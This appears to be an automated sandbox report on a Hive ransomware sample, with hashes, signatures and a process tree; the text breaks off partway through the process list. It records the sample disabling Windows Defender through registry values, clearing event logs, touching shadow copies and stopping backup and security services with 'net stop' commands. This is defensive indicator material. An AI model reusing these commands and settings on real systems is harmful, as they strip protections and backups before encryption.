Overview
overview
10Static
static
8211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-2004-x64
10hive.exe
windows7-x64
10hive.exe
windows10-2004-x64
10sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-2004-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-2004-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-2004-x64
10Resubmissions
23-12-2022 20:19
221223-y39gvahb28 1023-12-2022 19:54
221223-ymz88scc8w 1023-12-2022 19:42
221223-yerbcsha78 10Analysis
-
max time kernel
203s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2022 19:42
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
211xahcou.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20221111-en
Behavioral task
behavioral4
Sample
hive.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
sjl8j6ap3.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20221111-en
Behavioral task
behavioral8
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
zi1ysv64h.exe
Resource
win7-20221111-en
General
-
Target
zi1ysv64h.exe
-
Size
3.3MB
-
MD5
5384c6825a5707241c11d78529dbbfee
-
SHA1
85f5587e8ad534c2e5de0e72450b61ebda93e4fd
-
SHA256
3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21
-
SHA512
856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f
-
SSDEEP
49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno
Malware Config
Extracted
C:\K8zJ_HOW_TO_DECRYPT.txt
hive
Signatures
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid Process 344 wevtutil.exe 4428 wevtutil.exe 4592 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 4864 bcdedit.exe 4700 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
zi1ysv64h.exedescription ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-___V04tkpoz9Q0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-oob.xrm-ms.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__T5bks4uAGA40.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\TimelessLetter.dotx.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__gaNKrqyDdug0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125_contrast-white.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\messaging\bookmark_empty_state.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\plugin.js.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__f7D6DiPoRhE0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__m63N0MSLvnQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__TUo_WSKFfis0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-32.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__qOagKTEI3Yw0.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ui-strings.js.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__0w9-blQe2rQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\ui-strings.js.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__ZmcL-0gBuyY0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__ox0bfuwA4bc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\PREVIEW.GIF.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__-Y4EK2YNoQQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.scale-100.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Lumia.MagicEdit\Pages\ThreeWayBlendPage.xbf zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__RxuZR9SY2Zg0.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__eEiPDhMuRv00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\ui-strings.js.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__GtjY8f9L-Eo0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-ul-phn.xrm-ms.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__CuZzUttZc0w0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-40.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons.png.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__OS_mBKrFnTE0.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__hjjEqThRvTw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__bWNAebSLsFc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__73Cj_BWu2Qs0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\ui-strings.js.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__flZkJqmHuDw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\hu_get.svg.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__8ydmufb9y-A0.2o4xo zi1ysv64h.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\da\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\BuildInfo.xml zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\WideTile.scale-100.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__nH82ABh_HEk0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial1-ul-oob.xrm-ms.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__3NaPnIYSexg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\15.jpg zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-125.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.scale-125.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.scale-100.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__sK3fr1zljYw0.2o4xo zi1ysv64h.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\EVRGREEN.INF.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__41dbDTbp_HI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\69.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_scale-200.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview-hover.svg.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__vW2irHdkxzQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations_retina.png.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__mgLycWO0NZc0.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\US_export_policy.jar.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-___ym6lH61imc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__joyz6mbRMOI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__dtuEx5ug6jw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp2.scale-125.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxLargeTile.scale-100.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-1x.png.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__XUFlMmichw80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-32_altform-unplated_contrast-white.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-100.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Dark.scale-250.png zi1ysv64h.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__fc6jd0S0QH80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__43cEp3lD6eM0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\ui-strings.js.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__Wx3nrw3ZpXI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\it-IT\msdasqlr.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-200.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\added.txt.85O2aTDhPE_xG4Bt-vFWJZsHz9SLyZ2F_4yEas1X4-__Fh0m1NVIzGM0.2o4xo zi1ysv64h.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 1796 sc.exe 4504 sc.exe 3500 sc.exe 4152 sc.exe 4344 sc.exe 1720 sc.exe 3768 sc.exe 4828 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 3068 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exezi1ysv64h.exepid Process 4820 powershell.exe 4820 powershell.exe 2768 powershell.exe 2768 powershell.exe 4336 zi1ysv64h.exe 4336 zi1ysv64h.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 344 wevtutil.exe Token: SeBackupPrivilege 344 wevtutil.exe Token: SeSecurityPrivilege 4428 wevtutil.exe Token: SeBackupPrivilege 4428 wevtutil.exe Token: SeSecurityPrivilege 4592 wevtutil.exe Token: SeBackupPrivilege 4592 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4060 wmic.exe Token: SeSecurityPrivilege 4060 wmic.exe Token: SeTakeOwnershipPrivilege 4060 wmic.exe Token: SeLoadDriverPrivilege 4060 wmic.exe Token: SeSystemProfilePrivilege 4060 wmic.exe Token: SeSystemtimePrivilege 4060 wmic.exe Token: SeProfSingleProcessPrivilege 4060 wmic.exe Token: SeIncBasePriorityPrivilege 4060 wmic.exe Token: SeCreatePagefilePrivilege 4060 wmic.exe Token: SeBackupPrivilege 4060 wmic.exe Token: SeRestorePrivilege 4060 wmic.exe Token: SeShutdownPrivilege 4060 wmic.exe Token: SeDebugPrivilege 4060 wmic.exe Token: SeSystemEnvironmentPrivilege 4060 wmic.exe Token: SeRemoteShutdownPrivilege 4060 wmic.exe Token: SeUndockPrivilege 4060 wmic.exe Token: SeManageVolumePrivilege 4060 wmic.exe Token: 33 4060 wmic.exe Token: 34 4060 wmic.exe Token: 35 4060 wmic.exe Token: 36 4060 wmic.exe Token: SeIncreaseQuotaPrivilege 2320 wmic.exe Token: SeSecurityPrivilege 2320 wmic.exe Token: SeTakeOwnershipPrivilege 2320 wmic.exe Token: SeLoadDriverPrivilege 2320 wmic.exe Token: SeSystemProfilePrivilege 2320 wmic.exe Token: SeSystemtimePrivilege 2320 wmic.exe Token: SeProfSingleProcessPrivilege 2320 wmic.exe Token: SeIncBasePriorityPrivilege 2320 wmic.exe Token: SeCreatePagefilePrivilege 2320 wmic.exe Token: SeBackupPrivilege 2320 wmic.exe Token: SeRestorePrivilege 2320 wmic.exe Token: SeShutdownPrivilege 2320 wmic.exe Token: SeDebugPrivilege 2320 wmic.exe Token: SeSystemEnvironmentPrivilege 2320 wmic.exe Token: SeRemoteShutdownPrivilege 2320 wmic.exe Token: SeUndockPrivilege 2320 wmic.exe Token: SeManageVolumePrivilege 2320 wmic.exe Token: 33 2320 wmic.exe Token: 34 2320 wmic.exe Token: 35 2320 wmic.exe Token: 36 2320 wmic.exe Token: SeIncreaseQuotaPrivilege 2320 wmic.exe Token: SeSecurityPrivilege 2320 wmic.exe Token: SeTakeOwnershipPrivilege 2320 wmic.exe Token: SeLoadDriverPrivilege 2320 wmic.exe Token: SeSystemProfilePrivilege 2320 wmic.exe Token: SeSystemtimePrivilege 2320 wmic.exe Token: SeProfSingleProcessPrivilege 2320 wmic.exe Token: SeIncBasePriorityPrivilege 2320 wmic.exe Token: SeCreatePagefilePrivilege 2320 wmic.exe Token: SeBackupPrivilege 2320 wmic.exe Token: SeRestorePrivilege 2320 wmic.exe Token: SeShutdownPrivilege 2320 wmic.exe Token: SeDebugPrivilege 2320 wmic.exe Token: SeSystemEnvironmentPrivilege 2320 wmic.exe Token: SeRemoteShutdownPrivilege 2320 wmic.exe Token: SeUndockPrivilege 2320 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
zi1ysv64h.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 4336 wrote to memory of 3792 4336 zi1ysv64h.exe 84 PID 4336 wrote to memory of 3792 4336 zi1ysv64h.exe 84 PID 3792 wrote to memory of 1572 3792 net.exe 86 PID 3792 wrote to memory of 1572 3792 net.exe 86 PID 4336 wrote to memory of 2300 4336 zi1ysv64h.exe 87 PID 4336 wrote to memory of 2300 4336 zi1ysv64h.exe 87 PID 2300 wrote to memory of 2692 2300 net.exe 89 PID 2300 wrote to memory of 2692 2300 net.exe 89 PID 4336 wrote to memory of 1556 4336 zi1ysv64h.exe 90 PID 4336 wrote to memory of 1556 4336 zi1ysv64h.exe 90 PID 1556 wrote to memory of 4296 1556 net.exe 92 PID 1556 wrote to memory of 4296 1556 net.exe 92 PID 4336 wrote to memory of 4600 4336 zi1ysv64h.exe 93 PID 4336 wrote to memory of 4600 4336 zi1ysv64h.exe 93 PID 4600 wrote to memory of 344 4600 net.exe 95 PID 4600 wrote to memory of 344 4600 net.exe 95 PID 4336 wrote to memory of 216 4336 zi1ysv64h.exe 96 PID 4336 wrote to memory of 216 4336 zi1ysv64h.exe 96 PID 216 wrote to memory of 4428 216 net.exe 98 PID 216 wrote to memory of 4428 216 net.exe 98 PID 4336 wrote to memory of 3220 4336 zi1ysv64h.exe 99 PID 4336 wrote to memory of 3220 4336 zi1ysv64h.exe 99 PID 3220 wrote to memory of 1116 3220 net.exe 101 PID 3220 wrote to memory of 1116 3220 net.exe 101 PID 4336 wrote to memory of 3684 4336 zi1ysv64h.exe 102 PID 4336 wrote to memory of 3684 4336 zi1ysv64h.exe 102 PID 3684 wrote to memory of 3100 3684 net.exe 105 PID 3684 wrote to memory of 3100 3684 net.exe 105 PID 4336 wrote to memory of 4020 4336 zi1ysv64h.exe 106 PID 4336 wrote to memory of 4020 4336 zi1ysv64h.exe 106 PID 4020 wrote to memory of 4264 4020 net.exe 108 PID 4020 wrote to memory of 4264 4020 net.exe 108 PID 4336 wrote to memory of 4152 4336 zi1ysv64h.exe 109 PID 4336 wrote to memory of 4152 4336 zi1ysv64h.exe 109 PID 4336 wrote to memory of 4344 4336 zi1ysv64h.exe 111 PID 4336 wrote to memory of 4344 4336 zi1ysv64h.exe 111 PID 4336 wrote to memory of 1720 4336 zi1ysv64h.exe 113 PID 4336 wrote to memory of 1720 4336 zi1ysv64h.exe 113 PID 4336 wrote to memory of 3768 4336 zi1ysv64h.exe 115 PID 4336 wrote to memory of 3768 4336 zi1ysv64h.exe 115 PID 4336 wrote to memory of 4828 4336 zi1ysv64h.exe 117 PID 4336 wrote to memory of 4828 4336 zi1ysv64h.exe 117 PID 4336 wrote to memory of 1796 4336 zi1ysv64h.exe 119 PID 4336 wrote to memory of 1796 4336 zi1ysv64h.exe 119 PID 4336 wrote to memory of 4504 4336 zi1ysv64h.exe 121 PID 4336 wrote to memory of 4504 4336 zi1ysv64h.exe 121 PID 4336 wrote to memory of 3500 4336 zi1ysv64h.exe 123 PID 4336 wrote to memory of 3500 4336 zi1ysv64h.exe 123 PID 4336 wrote to memory of 1208 4336 zi1ysv64h.exe 125 PID 4336 wrote to memory of 1208 4336 zi1ysv64h.exe 125 PID 4336 wrote to memory of 3984 4336 zi1ysv64h.exe 127 PID 4336 wrote to memory of 3984 4336 zi1ysv64h.exe 127 PID 4336 wrote to memory of 4540 4336 zi1ysv64h.exe 129 PID 4336 wrote to memory of 4540 4336 zi1ysv64h.exe 129 PID 4336 wrote to memory of 4888 4336 zi1ysv64h.exe 131 PID 4336 wrote to memory of 4888 4336 zi1ysv64h.exe 131 PID 4336 wrote to memory of 4956 4336 zi1ysv64h.exe 133 PID 4336 wrote to memory of 4956 4336 zi1ysv64h.exe 133 PID 4336 wrote to memory of 1284 4336 zi1ysv64h.exe 135 PID 4336 wrote to memory of 1284 4336 zi1ysv64h.exe 135 PID 4336 wrote to memory of 616 4336 zi1ysv64h.exe 137 PID 4336 wrote to memory of 616 4336 zi1ysv64h.exe 137 PID 4336 wrote to memory of 3148 4336 zi1ysv64h.exe 139 PID 4336 wrote to memory of 3148 4336 zi1ysv64h.exe 139
Processes
-
C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1572
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2692
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4296
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:344
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4428
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1116
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
